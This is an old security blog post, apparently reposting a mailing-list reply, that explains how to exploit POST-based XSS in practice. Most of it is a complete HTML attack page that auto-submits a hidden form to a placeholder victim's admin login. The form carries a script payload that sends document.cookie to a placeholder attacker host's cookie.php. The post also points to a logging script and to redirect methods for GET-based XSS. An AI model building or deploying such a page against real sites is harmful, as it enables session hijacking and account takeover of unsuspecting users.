ush.it - a beautiful place

Pratical XSS n1

April 14, 2006 at 3:06 am - Filed under aa, bb - 503 words, reading time ~1 minutes - Permalink - Comments

This is a short email i wrote in reply to v9 AT fakehalo.us on vuln-dev@securityfocus.com focused on how to exploit XSS vulnerabilities in the real world.

v9@fakehalo.us wrote:
> I understand the possibilities of XSS, however if you
> have to inject it as part of the URL
[cut]

xss are serious bugs, as like header injection and session fixation

xss are less critical than full sql injections + onto outfile in your
cgi-bin directory (for example) or other vectors

anyway, an xss can be exploited in many ways and also in conjunction
with other technologies as like phishing

an other way could be a doorway page as like for http post xss

this is an example

--example.html--

<html>
<head>
 <title>title</title>
 <style type="text/css" media="screen,print">
 body { margin:0; padding:0; }
 body, html{ font-family:"Trebuchet MS", Georgia, Verdana, serif; color:white; }
 a { color:white; text-decoration:none; }
 </style>
 </head>
 <body onload="document.login_form.submit()"><!-- force gateway, onload -->
 <table width="100%" height="100%" bgcolor="#9BBB38"><tr><td valign="center" align="center">

  <!-- simple and effective, xss post gateway coded by ascii, vuln by saidone -->
  <form method="post" action="http://www.VICTIM.TLD/admin/index.php" name="login_form">
   <input type="hidden" id="user" name="FIELD_username" value="<script>javascript:alert('XSS vuln, your cookie is '+document.cookie+'. Now your PHP session is haxored and the cookie value is sent back to the malicious haxor! (Press OK to send the cookie value and continue you hajacked navigation..)');document.write('<img src=\'http://ATTACKER.TLD/cookie.php?cookie='+document.cookie+'\'>');</script>" />
   <input type="hidden" id="pass" name="FIELD_password" value="" />
   <!--<button type="submit" name="submit">Vai</button>-->
  </form>
  <div style="background-color: green; height: 95%; width: 95%;" onclick="document.login_form.submit()" onmouseover="document.login_form.submit()"><!-- force gateway, onclick and onmouseover -->
   <h1><a href="#" onclick="document.login_form.submit()">click everywhere</a></h1><!-- force gateway, onclick -->
  </div>
  <!-- the end : ) -->

</td></tr></table><img src="http://devel.ush.it/track/me.php" /><a href="http://www_ush_it">www_ush_it</a>
</body>

--/example.html--

cookie.php will store the user session cookie, if you need a generic
logger you could dump any GPC variables as done by this simple script

http://www_ush_it/team/ascii/hack-xsstrap/track.phps

for http get xss you could use meta refresh or document.location
directly (simplier to implement, less code)

regards, ascii, http://www_ush_it/
Reed's Alert! Got something burning? Tell USH team.
THP USH (HTTPS) Wisec DigitalBullets TheHackersPlace network